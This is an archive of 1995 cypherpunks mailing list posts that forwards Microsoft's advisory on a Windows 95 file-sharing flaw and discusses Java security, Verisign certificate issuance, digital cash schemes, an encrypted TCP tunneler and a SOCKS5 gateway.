Message-ID: <Pine.OSF.3.91.951021053719.24988A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I am on a Microsoft mailing list that is for developers of Win95 stuff. 
Today I found this in my mailbox. This file details a security bug in 
Win95 that I thought might be interesting to the group.
Regards, 

Tim Philp
Brantford, Ontario,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



---------- Forwarded message ----------
Date: Fri, 20 Oct 1995 17:15:33 -0700
From: WinNews@Microsoft.com
To: WinNews@microsoft.nwnet.com
Subject: WinNews Special Issue

           Microsoft(R) WinNews Electronic Newsletter
		Special Issue,  October 20, 1995

***********************************************************
Here is some important information on Windows 95 that
may affect some of you.  Please make certain to read it.


UPDATED DRIVERS FOR WINDOWS 95 FILE AND PRINTER SHARING 
SECURITY ISSUE - October 20, 1995

Microsoft wants its customers to know that it has
discovered and fixed a potential security problem with file
and printer sharing in Windows 95.  Only customers who have
enabled file and printer sharing - a non-default option -
may have been at risk, and, to the best of our knowledge,
no users have been harmed.  Nevertheless, Microsoft
regards this potential problem with the greatest
seriousness and, we have worked hard over the past week to
resolve it.  Microsoft recommends customers using File and
Printer Sharing upgrade to the newer drivers.


How do I know if I am affected?
Only customers that use the File and Printer Sharing option
to share their files with other users on a network are
affected.  This option is not enabled by default so unless
you have manually enabled it, you are not affected by this
issue.  To determine if File and Printer Sharing is
enabled, choose the Networks Option in the Control Panel.

If file and printer sharing is enabled, you  will see
either "File and Printer Sharing for Microsoft Networks"
or "File and Printer Sharing for NetWare Networks" in the
list of installed network components.


What are the issues? 
File and Printer Sharing for NetWare Networks

Microsoft was recently made aware of an issue with File
and Printer sharing for NetWare Networks which may affect
data security for corporate users.

Only users whose environments meet both of the following
conditions may be affected:

    1. They configure their machine to share files and
        printers with other users on the network using File
        and Printer Sharing for NetWare networks (This
        option is not turned on by default)
    2. They enable remote administration or install
        Microsoft Remote Registry Services  (These options
        are not turned on by default)


If your configuration matches that listed above, it is
possible for another user on the network to gain read-only
access to your machine after the administrator has logged
off the machine and until you restart your computer.  To
correct this problem, Microsoft has issued an updated
driver for File and Printer Sharing for NetWare Networks.
The updated driver ensures that only valid administrators
have access to the computer's drive.

File and Printer Sharing for Microsoft Networks (not MSN:
    The Microsoft Network online service)

Microsoft is also issuing an update for a known problem
with File and Printer Sharing for Microsoft Networks and a
certain UNIX shareware network client (Samba's SMBCLIENT).
The update corrects a problem with share-level security
documented in the Microsoft Knowledge Base on October 9th.
The update also includes a correction for a similar problem
with user-level security that Microsoft recently discovered
as part of its internal testing of the new driver.

Customers whose environments meet all of the conditions
below, may have their data susceptible to network or
Internet hackers:

    1. They configure their machine to share files and
        printers with other users on the network using File
        and Printer Sharing for Microsoft Networks (This
        option is not turned on by default)

    2. They share a LAN, Internet, or Dial-Up connection
        with a UNIX-based computer running Samba's
        SMBCLIENT software

    3. The network administrator does not disable peer
        services using System Policies

The Samba SMB client allows its users to send illegal
networking commands over the network. The Samba client is
the only known SMB client at this time that does not filter
out such illegal commands.  SMBCLIENT users do not
automatically have access to the Windows 95 drive, and
must know the exact steps to send these illegal commands.

The updated driver prevents these illegal commands from
being executed, preventing SMBCLIENT users from accessing
the drive on which sharing is enabled.  With the updated
driver, the SMBCLIENT user will only have access to those
shared folders that the Windows 95 user has designated.

How do I get the Updated Drivers?
(Please note that this only affects English language 
versions of Windows 95.) 
Both drivers are available for immediate download from the
Internet (http://www.microsoft.com/windows), The Microsoft
Network online service, and is being made available to
other online services including CompuServe, America Online,
and Prodigy.  The updated drivers will also be mailed to
any user free of charge if they call Microsoft's FastTips
line, 800-936-4200, beginning Monday, October 23rd.

Microsoft is committed to providing safe connectivity
solutions for customers.  Microsoft takes this
responsibility seriously and has worked, and will continue
to work, with great speed to provide solutions for
customer issues.   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 21 Oct 95 13:51:08 PDT
To: cypherpunks@toad.com
Subject: Sun speaks out - but not to the cypherpunks
Message-ID: <9510211053.AA22644@all.net>
MIME-Version: 1.0
Content-Type: text


This response came from Sun to Risks:

> Date: Mon, 16 Oct 1995 21:22:40 -0700
> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
> Subject: Re: Risks in Java
> 
> If we are going to "analyze" java security, let's keep in mind that there is
> an important distinction between the language (java) and the machinery which
> runs the java program.
> 
> Java is a general-purpose programming language along the lines of C/C++.
> So, there is no doubt that its expressive power overwhelms our
> theoretician's abilities to predict java-programs behavior -- this is where
> we start getting into the halting problem, computability and other black
> magic.  Basically, i don't think we can "trust" programs written in any
> *useful* programming language.

Read: We can't trust Java programs.

> The area where we can (must) build trust is the computing base.
> Traditionally, this has been the OS, but in the case of java, it is the java
> interpreter (such as netscape 2.0 and hotjava).  The browser is now the TCB
> (trusted computer base) for all practical purposes...

Read: The Java interpreter is supposed to be a TCB

> And, to address the specific concern about applets spamming the net -- from
> what I've seen, applets are only allowed to connect to the server that
> supplied the applet in the first place (by default).  The worst thing one
> could probably pull off is to spam oneself.

Read: By default only - also note, none of this invalidates attacks 30-49
from the previously posted list.

Who here truly believes that the implementations of Java meet the
requirements of a TCB?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 21 Oct 95 13:53:08 PDT
To: cypherpunks@toad.com
Subject: Re: Verisign and MITM
In-Reply-To: <199510201540.IAA11523@infinity.c2.org>
Message-ID: <199510211553.IAA02421@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>	I recently submitted a certificate request to Verisign for my
>SSL web server. Looking over the process, I don't see how it avoids
>MITM in any way.
>[...]
>	I don't see any mechanism in place to avoid an MITM subverting
>step (A), and putting in his cert request in there. There isn't a
>strong cryptographic unforgeable relationship between my
>usmail/fax/proof request and the emailed kx509 cert request.

I guess the one limitation is that you would either not get the
certificate (because the MITM kept it) or you would find out that it did
not include your public key (if he forwarded it to you).  In either case
the MITM would be discovered.  In the mean time he could wreak some
havoc, though.  But he would be found out after a few days.  That's one
of the things they need Certificate Revocation Lists for in their system,
but I don't know if they are used.

Hal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:53:50 PDT
To: perry@piermont.com
Subject: Re: Challenge: Hack Elementrix!
In-Reply-To: <199510211414.KAA12978@jekyll.piermont.com>
Message-ID: <199510211658.JAA11043@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> them. (By the way, Sameer keeps doing end runs around me and paying
> for prizes -- no fair! I want to spend some of my money
> occassionally!)

	I'll let Perry take care of this one, actually. I'm
concentrating on the big players, and I've actually never heard of
Elementrix. -- Doing Microsoft is tough enough, given my complete lack
of knowledge about microsoft products.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 21 Oct 95 13:52:18 PDT
To: "Dana W. Albrecht" <dwa@corsair.com>
Subject: Re: Challenge: Hack Elementrix!
In-Reply-To: <199510210308.UAA07881@elmos.corsair.com>
Message-ID: <199510211414.KAA12978@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Dana W. Albrecht" writes:
> I think that with all the recent attention to Netscape and Microsoft that
> another target has been altogether overlooked:  Elementrix POTP <spit>.

Indeed. I think it is very important that someone out there embarass
these guys. They are truly a frighteningly bad bunch -- totally
ignorant, it seems, of cryptography, and arrogant to boot. Breaking
their software would probably have the good result of keeping people
from being hurt by them, and might even convince them to sell good
stuff in the future instead of snake-oil. If I had the time to
hack their stuff I'd do it myself, but I'm willing to contribute the
cost of a prize T-Shirt for the person who successfully breaks
them. (By the way, Sameer keeps doing end runs around me and paying
for prizes -- no fair! I want to spend some of my money
occassionally!)

> > 1. Breathless, overhyped language ("revolutionary", "breakthrough", etc)
> > 
> > 2. Clear misstatements of well-established theoretical principles
> > (the discussion of the one-time pad)

Yup.

> While Elementrix has failed to provide any detailed technical information
> (specifications, source code, etc.) this is not entirely out of reach.
> 
> You can obtain an evaluation copy of their "secure" FTP client from
> ftp://ftp.elementrix.co.il/pub/secftp/
> 
> This appears to be a binary for Microsoft Windoze.

Doesn't sound like it would be too hard to hack. Gentlemen, start your
microprocessors!

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sat, 21 Oct 95 13:54:52 PDT
To: cypherpunks@toad.com
Subject: Re: Java power
In-Reply-To: <199510210424.AAA17318@opine.cs.umass.edu>
Message-ID: <199510211732.KAA05181@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I'm trying to mentally compare this scenario with the use of a
> cryptographically-outfitted mailer operated through an encrypted telnet 
> session. 
> 
> First of all, I suppose the browser has groovy bells and whistles to spice
> up reading email. Maybe you could run a snazzy GUI standalone mailer in some
> windowing protocol through the encrypted telnet link as an alternative. This 
> is largely irrelevant to me personally, but could make a huge difference to 
> the hoi polloi.
> 
> Ignoring such interface concerns, what kinds of situations would be conducive
> to the JavaMail approach but not, say, ssh+Elm+PGP ? Perhaps I'm visiting
> someone where there's no local POP for my ISP. The friend I'm visiting has 
> e.g. an AOL account. I would like to read mail on my remote account via her
> AOL browser. Am I wrong in assuming that I couldn't execute a telnet: URL
> with the AOL browser ?

The difference is the ubiquity of the infrastructure. Indeed, nothing
in my scenario differs on a technical basis from encrypted telnet +
PGP. However, in my scenario, anybody with a Java-capable Web browser
would be able to access the service, just by clicking on a link.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 13:54:01 PDT
To: cypherpunks@toad.com
Subject: Re: Polymorphic e-cash schemes was: digital cash and identity disclosure
Message-ID: <acae77bb4f0210048575@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 PM 10/20/95, Hal wrote:

[Bryce's proposal elided]

>Unfortunately, in order for a coin to be POTENTIALLY spent in an off-line
>way, the protocols require that the identity of the withdrawer be
>embedded, in blinded form, within the coin data.  It is this step that
>Tim and others object to, because among other things it requires
>participants to securely identify themselves to the bank, hence does not
>work well in a fully anonymous society.  The reason for this requirement
>is that if the coin is double-spent, this is not found out until
>afterwards, and so the identity of the cheater has to be available so the
>bank can go after him.
>
>So letting the payee choose whether to deposit the coin right away or
>wait until later will not address this basic privacy problem with offline
>cash.

Indeed.

And let me clearly state that I am not proposing an either-or situation. In
a real ecology of competing digital cash schemes, unconstrained by the
software patent issue we now are facing, there would likely be "online
clearing only" systems, "offline clearing only" systems, and various
hybrids and variants. The market would then decide, based on transaction
costs, convenience, security, anonymity features, etc. As with the "real"
economy, where a variety of financial instruments coexist.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 13:54:12 PDT
To: sameer <cypherpunks@toad.com
Subject: Re: Verisign and MITM
Message-ID: <acae797450021004ecea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[ssl-users@mincom.oz.au deleted from the distribution, as I am not on that list]

At 3:40 PM 10/20/95, sameer wrote:
>        I recently submitted a certificate request to Verisign for my
>SSL web server. Looking over the process, I don't see how it avoids
>MITM in any way.
....
>        I don't see any mechanism in place to avoid an MITM subverting
>step (A), and putting in his cert request in there. There isn't a
>strong cryptographic unforgeable relationship between my
>usmail/fax/proof request and the emailed kx509 cert request.

An interesting "direct demonstration" of this would be to get a certificate
generated for a well-known company, institution, or political candidate.
This would demonstrate the flaws in the e-mai/fax/snailmail process like
nothing else.

(Tangential note: Of course, my fear is always that exposing such flaws
shows that "we need a national identity system." After all, what Sameer is
describing is implicit in the fact that neither e-mail, nor a fax, nor
snail mail, is proof that an entity exists, or that the paperwork
represents the entity. That's a tough nut to crack, absent an "is-a-person"
or "is-an-institution" credentialling system.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:55:05 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Verisign and MITM
In-Reply-To: <acae797450021004ecea@[205.199.118.202]>
Message-ID: <199510211753.KAA17410@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> An interesting "direct demonstration" of this would be to get a certificate
> generated for a well-known company, institution, or political candidate.
> This would demonstrate the flaws in the e-mai/fax/snailmail process like
> nothing else.

	That wasn't quite the point. If I submitted a key and
paperwork for the key claiming to be Jim Bidzos, and they gave me a
cert for that, that wasn't my point. My point was simply the technical
linking of the paperwork and the key. I figured that a relatively easy
way to fix that would be to require an MD5 of the key included with
the faxed paperwork. It has been mentioned to me though that an MITM
would be noticed once verisign sent me back a signed cert and it
didn't work with my key.

> 
> (Tangential note: Of course, my fear is always that exposing such flaws
> shows that "we need a national identity system." After all, what Sameer is
> describing is implicit in the fact that neither e-mail, nor a fax, nor
> snail mail, is proof that an entity exists, or that the paperwork
> represents the entity. That's a tough nut to crack, absent an "is-a-person"
> or "is-an-institution" credentialling system.)
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:55:25 PDT
To: cypherpunks@toad.com
Subject: bernstein results?
Message-ID: <199510211856.LAA25175@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	So when do we find out what the judge had to say about the
hearing on Friday?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 21 Oct 95 13:53:20 PDT
To: froomkin@law.miami.edu (Michael Froomkin)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <Pine.SUN.3.91.951020220855.25323J-100000@viper.law.miami.edu>
Message-ID: <199510211620.MAA19993@homeport.org>
MIME-Version: 1.0
Content-Type: text


Michael Froomkin wrote:

| i would like to propose the following radical idea:  Chaumian digicash is 
| a nice curiosity.  The future in the mdeium term (10+ years) for better 
| or worse belongs to Mondex.

	Deploying hardware is VERY expensive.  30m internet users at
$100 (half hardware, half tech support) is 3 billion dollars to deploy
today.  Secure commerce on the internet would drive that 30m figure
(which will probably double this year anyway) way up.

	Digicash doesn't need observer cards, which gives them a huge
advantage.  If they ever sign with a real bank.

	"Tired of mondex's spending limits and slow servers?  Convert
your Mondex to Digicash today, and we'll give you a FREE copy of
Cypherpunk Lab's Lottery Screensaver!!!"

	On the other hand, Digicash might never deploy.  But it does
have features other than privacy that make it attractive.  (So does
FV, possibly other schemes)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 21 Oct 95 13:53:33 PDT
To: an407769@anon.penet.fi
Subject: Re: faxes are not secure
In-Reply-To: <9510210219.AA22436@anon.penet.fi>
Message-ID: <199510211634.MAA02770@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> BBC Discovers Faxes Are Not Secure (no shit, Sherlock)
> BLACKPOOL, LANCASHIRE, ENGLAND, 1995 OCT 19 (NB) -- The British Broadcasting
> Corporation (BBC) found out late last week that faxes are not a secure
> transmission system. 

Risks had a case where (If I recall correctly) Intel was one party or
the other. Seems there were two John Henry Smith's or such at the hotel
and the fax went to the worng one...

I suspected the "wrong" one was a plant by the competing firm.
That and $100.00 to a bellboy would ensure the result.

The question is, how can the 'Punks use this to promote encrypted email
instead of faxes?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sat, 21 Oct 95 13:51:23 PDT
To: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <m0t6dwp-0006UrC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Holger" Reif <Holger.Reif@PrakInf.TU-Ilmenau.DE> writes:

Holger> I don't understand how this could happen? The two coins are
Holger> identical (as I understood it from the tech backgound of
Holger> ecash). what has a double- spended coin what a copied
Holger> single-spended coin not has?

In Chaum's system spending a coin is a cut-and-choose protocol: with
overwhelming probability you reveal informations about your ID, when
you present your e-coin a second time.


Bye!

Michael Deindl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 20 Oct 95 14:21:44 PDT
To: cypherpunks@toad.com
Subject: Job Openings at Consensus (Mostly RSAREF related)
Message-ID: <v02120d05acaf12a718e6@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Heya all, thanks for the suggestions regarding 'dream features' for RSAREF.
The best thing is, we can actually do some of them, and have some
compromises for others. (We can't allow unlimited calls for instance, but
we do have a process for setting up new APIs so people can tie in to other
algorithms officially.) For those who are expecting mail from me regarding
licensing, hold in there. we had to clear up a couple misphrasings that
hadn't been caught. That's dealt with, and the contact looks clean... now
to just get the license up and ready. (Sorry, I really had thought it would
have been out to you all already.)

After all the discussion recently about rewards for crypto work, and such,
I thought this might interest some people. Between RSAREF and some other
projects it seems we can hire some more folk. This went out on the RSAREF
Announcement list, but I thought some of the people on Cpunk might be
interested. (Be warned though, we aren't a hard core development house, the
focus is on human focused electronic technologies, for which privacy, trust
and encryption are neccessary. Its why I enjoy the place, but it might not
be for everyone.) Anyway, if you have questions send them to me. If you
actually want to apply, send them to ChristopherA@consensus.com.

Later,

Jonathan

----------

Consensus Development Corporation is a rapidly growing software development
and consulting firm in the privacy and security field. We are the exclusive
commercial licensor of the RSAREF toolkit and offer consulting and
development services to companies including Apple Computer, RSA Data
Security, VeriSign, Visa International, etc.

We need people for the following:

Lead Engineer
-------------
Candidate will lead a team of staff and outside contractors to develop
digital signature software. Candidate is expected to have experience with
encryption and privacy software. Experience in Windows and/or Mac
application and GUI design is required. General experience with BSAFE,
TIPEM, RSAREF, C++, cross-platform development, internet standards and
TCP/IP coding desirable.

Support Engineer
----------------
Candidate will be providing front-line technical support to our RSAREF
commercial licensees, integrating C code submitted by outside contributers
into RSAREF, as well as writing new technical documentation and FAQs for
new versions of RSAREF. This can be an entry-level position with only C
experience required, however, individuals with more experience is
desirable.

Interns
-------
We have several 2 to 3 month intern positions for work in the encryption
and internet standards areas, including porting of code supporting internet
standards across platforms, preparing internet-drafts of new standards, and
supporting our full-time engineering staff.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sat, 21 Oct 95 13:52:53 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <m0t6e5R-0006UrC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Michael" == Michael Froomkin <froomkin@law.miami.edu> writes:

Michael> i would like to propose the following radical idea: Chaumian
Michael> digicash is a nice curiosity.  The future in the mdeium term
Michael> (10+ years) for better or worse belongs to Mondex.

Michael> Comments?

Mondex keeps their protocols confidential.  Not so good to establish
trust in the system.

I also heart _rumours_, that several things went wrong in their
current field-test.  Reminds me that I should go after these rumors.

Additionally several banks begin to establish their own e-cash
systems.  E.g. in Germany from 1st January 1997 on nearly every
bank-customer will have an electronic-purse.


The main problem with e-cash proposed by Chaum et al. is that current
SmartCards are not powerful enough to handle the needed computation in
a timely fashion.

The purse proposed by the german banks you have a simple counter on
your SmartCard.  With this system you _must_ have identification of
payer and payee to clear malfunctions or frauds by either party.


Bye!

Michael Deindl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 21 Oct 95 15:18:21 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Encrypted TCP Tunneler
Message-ID: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am writting a program called Encrypted TCP Tunneler, which I hope to
finish in a month or so.  It will allow a secure link to be set up between
an ETT client and an ETT server, using Diffie-Hellman and DSA for
authenticated key exchange, and Blowfish for encryption.  A user will be
able to open a TCP connection to the client and have that connection
transparently tunnel across the secure link to a TCP address on the other
side. 

I see several uses for this program, such as secure telnet, secure web 
access, and access to a secure network across an insecure network.  I 
realize the program will no be as useful when IPv6 becomes widely 
available, but that may not happen for a while.  Also, this program can 
be used on top of IP security to give users (as opposed to system admins) 
more control over their own security.

Please send comments and suggestions.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 21 Oct 95 15:49:50 PDT
To: Thomas Grant Edwards <kelso@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510212249.PAA22804@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 10/19/95 -0400, Thomas Grant Edwards wrote:
>This would require the remailer to examine entropy of messages passing 
>through.  Anything not random enough gets tossed.


A simple entropy measuring algorithm:

Generate N random pointers into a file. (or extract N random short 
strings from the file)

Sort them into order of the strings,

Find the number of bits in common between one string and the 
next string.  Total up S, the number of bits in common

Calculate (N * lg N)/S

For an encrypted file, this quantity should be close to unity, because 
the order in an encrypted file should not be easily detectable.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sat, 21 Oct 95 15:43:18 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
Message-ID: <v03003702acaf1df73553@[198.93.25.66]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 21.10.95, Adam Shostack wrote:

>Michael Froomkin wrote:
>
>| i would like to propose the following radical idea:  Chaumian digicash is
>| a nice curiosity.  The future in the mdeium term (10+ years) for better
>| or worse belongs to Mondex.
>
>       Deploying hardware is VERY expensive.

Expense of deployment for this type of scheme does not seem to be a
consideration for banks; they stand to make a ton of money as a result.
There are areas where banks will resist spending money on new hardware,
but smart-card stuff isn't one of them.

> 30m internet users at $100 (half hardware, half tech support) is 3
> billion dollars to deploy today.  Secure commerce on the internet would
> drive that 30m figure (which will probably double this year anyway) way
> up.

Adding hardware to a personal computer to read from and write to smart
cards will cost money, but the majority of bank customers will not be
interested in Internet-based transactions for quite some time. So while
the potential market of Internet consumer financial transactors seems
large, it is dwarfed by the sum total of bank customers who are likely
to wind up with some form of non-pilot smart card-based payment system
within the next 2 years.

I've been told that a PCMCIA card that reads smart cards would around
$30ish; I've not had the time to follow this claim up, so it could be
off by a bit. Assuming it's accurate, the price doesn't present a
significant hurdle to the typical PC-based consumer. And if there is
enough demand, I'm sure that smart card readers will find their way
into desktop and laptop machines over time. For example, Catapult's
XBAND modem for Genesis and SNES has an ISO smart-card reader/writer in
it; such a consumer device's manufacturing cost is sensitive to even a
few pennies, so it can't've cost much to put it in there.

I consider it much likelier that non-Internet specific payment systems
will adapt to the Net, instead of Net-specific payment schemes seeing
broad deployment. To clarify: I consider CyberCash and FV to be
Net-adaptations of conventional schemes, rather than brand new payment
systems.

> Digicash doesn't need observer cards, which gives them a huge advantage.
>  If they ever sign with a real bank.

There is a US law called the Bank Secrecy Act that defines the
responsibilities of banks with regard to audit trails, record keeping,
and disclosure of financial transaction information. After talking to
quite a few people both in the regulatory and business realms recently,
I am convinced that truly anonymous e-cash simply isn't going happen in
the US. And the US is going to have considerable influence on how
things go in the rest of the world; whether this is a good thing or not
is, unfortunately, an unrelated and purely philosophical debating
point.

Based on my knowledge of the backing behind Mondex at this relatively
early stage in the game, I am inclined to agree with Michael.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 21 Oct 95 18:03:58 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510220102.SAA12922@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>I am writting a program called Encrypted TCP Tunneler, which I hope to
>finish in a month or so.  It will allow a secure link to be set up between
>an ETT client and an ETT server, using Diffie-Hellman and DSA for
>authenticated key exchange, and Blowfish for encryption.  A user will be
>able to open a TCP connection to the client and have that connection
>transparently tunnel across the secure link to a TCP address on the other
>side. 

This has a lot of potential uses.  It would be good if chaining were
possible, although that requires the client to double-encrypt.  That way
it can let people connect out without local snoopers seeing where they
are connecting.  However for this to work it is necessary that the DNS
lookup be done by the server rather than the client, and for the
destination (to which the server is supposed to connect) to be passed
encrypted.

I should mention by the way that I don't share the general pessimism
towards anonymous TCP/IP connections.  While truly strong anonymity
against a hugely powerful opponent is difficult, I think a system like
what Wei is describing would still provide important privacy protections
as more people get hooked into the net.

It should be noted that SOCKS V5 has basically the functionality that Wei
is describing, but I am not sure whether any implementations exist.  It
also has some other features which might not be appropriate for
this use.  The purpose of SOCKS is to tunnel through firewalls.

>I see several uses for this program, such as secure telnet, secure web 
>access, and access to a secure network across an insecure network.  I 
>realize the program will no be as useful when IPv6 becomes widely 
>available, but that may not happen for a while.  Also, this program can 
>be used on top of IP security to give users (as opposed to system admins) 
>more control over their own security.

Unfortunately there is a also huge misuse of this program, as a
connection laundry for breakin attempts.  Hackers already go through
layer after layer of broken accounts, etc. to make tracebacks
difficult.  Read Stoll's "Cuckoo's Egg" for one account.  I think the
Mitnick story is similar.  These packet laundries would be extremely
inviting for this purpose.  The first time the ETT server is the base
of a lot of breakin attempts to military installations there is going
to be trouble.  SOCKS provides a config file for servers to limit what
kinds of connections will be allowed, but it is hard to see how to
filter out the bad guys while letting people go through who are
using services for which they are authorized.

Even if you don't try to provide anonymity with this service I think it
is still going to be a problem if breakins come from the server.  By
the time the traceback is initiated it is going to be a pain to figure
out where the connection was coming from.  The service would be similar
in this context to providing free guest accounts to which you could
telnet in and then telnet out.  I think any site which did this (some
used to in the relaxed old days) would take a lot of heat today.

I was toying with a limited form of this idea earlier, where outgoing
connections would be limited to http servers.  These are usually on a
small number of ports, although there are exceptions.  At least it
would be possible to filter out telnet and rlogin and such for that
application.  I don't think there are too many bad things you can do
just by connecting to httpd ports (probably I would be surprised,
though...).  But doing that would not make as much sense for the ETT
application.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 19:03:30 PDT
To: cypherpunks@toad.com
Subject: experimental socks5 gateway
Message-ID: <199510220158.SAA20609@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	so I've installed a socks5 server on infinity.c2.org, port
1080. Socks5 is available from
coast.cs.purdue.edu:/pub/tools/unix/socks

	This is for experimental purposes only. Full logs are kept.
It may go down at any time. It may not work. Your computer might blow
up. etc. etc.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
